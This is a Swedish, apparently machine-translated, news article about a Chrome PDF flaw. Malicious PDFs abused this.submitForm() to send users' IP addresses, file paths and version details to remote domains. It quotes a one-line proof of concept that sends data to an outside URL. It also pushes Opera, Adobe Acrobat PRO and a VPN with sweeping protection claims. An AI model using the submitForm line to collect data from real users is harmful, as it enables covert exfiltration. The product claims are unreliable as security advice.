Utnyttjandetjänst EdgeSpot upptäckte en spännande Chrome-nolldagars sårbarhet som utnyttjar PDF-dokument.
Sårbarheten tillåter angripare att skörda känslig data med skadliga PDF-dokument som öppnas i Chrome.
Så snart offret öppnar respektive PDF-filer i Google Chrome börjar ett skadligt program arbeta i bakgrunden genom att samla in användardata.
Uppgifterna vidarebefordras sedan till fjärrservern som kontrolleras av hackarna. Du kanske undrar vilken data som sugs av angriparna, de riktar sig mot följande data på din dator:
- IP-adress
- Fullständig sökväg för PDF-filen på systemet
- OS- och Chrome-versioner
Akta dig för skadade PDF-filer
Experter upptäckte att en av de två domänerna readnotify [.] com eller burpcollaborator [.] net fick data.
De avslöjade att angriparna använder this.submitForm () PDF Javascript API för att samla in känslig information från användarna.
Vi testade det med en minimal PoC, ett enkelt API-samtal som this.submitForm ('http://google.com/test') får Google Chrome att skicka personuppgifter till google.com.
Denna Chrome-bugg utnyttjades av två olika uppsättningar av skadliga PDF-filer, som båda cirkulerades i oktober 2017 respektive september 2018.
Speciellt kan insamlade data användas av angriparna för att finjustera attacker i framtiden. Rapporter tyder på att den första satsen filer sammanställdes med ReadNotifys PDF-spårningstjänst.
Användare kan använda tjänsten för att hålla reda på användarvyerna. EdgeSpot har inte delat några detaljer om typen av den andra uppsättningen PDF-filer.
Snabbtips: Ändra din webbläsare till Opera
I dessa oroliga tider attackeras vi med skadlig kod, nätfiske och trojaner i varje steg så vi måste vara mycket mer vaksamma och hålla oss skyddade.
Och eftersom detta är ett specifikt problem för Chrome kan du undvika det hotet och alla andra med en säkerhetsinriktad webbläsare som Opera.
Denna webbläsare levereras med en inbyggd annonsblockerare som inte bara rensar sådana distraktioner utan också blockerar analysskript, spårningspixlar och metoder för att samla in dina data.
Och om du vill vara helt säker på att du håller dig borta från någon fara, gå bakom den inbyggda VPN-tjänsten som är 100% gratis att använda i obegränsad tid.
Opera
Opera erbjuder det perfekta hotskyddet med den inbyggda ad-blockeraren och VPN-tjänsten gratis! Få det gratis Besök hemsidaHur kan jag hålla mig skyddad från PDF-sårbarheter?
Ladda ner Adobe Acrobat PRO
Adobe och Chrome matchar bra när det gäller hantering av PDF-filer. Genom att installera Adobe Extension för Chrome kan du granska och manipulera PDF-filer efter eget tycke utan att lämna din favoritwebbläsare.
Trots sin robusta struktur kan skadlig programvara som är dold i PDF-filer kanske inte upptäckas om du använder standardversionen av Reader.
Den professionella versionen rekommenderas för att garantera ditt skydd och hålla dina data borta från hackare.
Även om det inte är gratis är priset du betalar ganska litet för överflödet av ytterligare funktioner du kommer att njuta av, inklusive den förbättrade säkerheten för dina PDF-filer.
Det ingår också en 7-dagars gratis provperiod så att du kan få en smakprov på hela Pro-upplevelsen innan du köper.
Adobe Acrobat PRO
Håll dig borta från skadlig programvara genom att ladda ner Adobe Acrobat PRO. Den har mycket mer funktion än den fria versionen och håller dina data säkra. Gratis provperiod Besök webbplats Läs merOm du vill vara säker när du surfar på internet måste du få ett helt dedikerat verktyg för att säkra ditt nätverk. Installera privat internetåtkomst nu och säkra dig själv. Det skyddar din dator från attacker medan du surfar, maskerar din IP-adress och blockerar all oönskad åtkomst.
Exploitdetekteringstjänsten EdgeSpot ville varna Chrome-användarna om de potentiella riskerna eftersom plåstret inte förväntades släppas inom en snar framtid.
EdgeSpot rapporterade till Google om sårbarheten förra året och företaget lovade att släppa en patch i slutet av april.
Du kan dock överväga att använda en tillfällig lösning på problemet genom att lokalt visa de mottagna PDF-dokumenten med en annan läsarapp.
Alternativt kan du också öppna dina PDF-dokument i Chrome genom att koppla bort dina system från Internet.
FAQ: Läs mer om Chrome-tillägg
- Fungerar Privacy Badger med Chrome?
Ja det gör det. Men om du vill ha ett bredare urval, utforska våra toppval för Chrome-sekretessförlängningar i den här fullständiga guiden.
- Kan du redigera PDF-filer i Chrome?
Det finns många tillägg som tillåter bearbetning av PDF-filer. Kolla in vår utmärkta guide om de bästa PDF-tilläggen för Chrome.
- Har Google en QR-kodgenerator?
Det gör det inte men du kan aktivera det snabbt. Här är vår omfattande guide om hur du aktiverar QR-kodgeneratorn i Chrome.
Redaktörens anmärkning: Det här inlägget publicerades ursprungligen i april 2020 och har sedan uppdaterats och uppdaterats i augusti 2020 för friskhet, noggrannhet och omfattning.
- Cybersäkerhet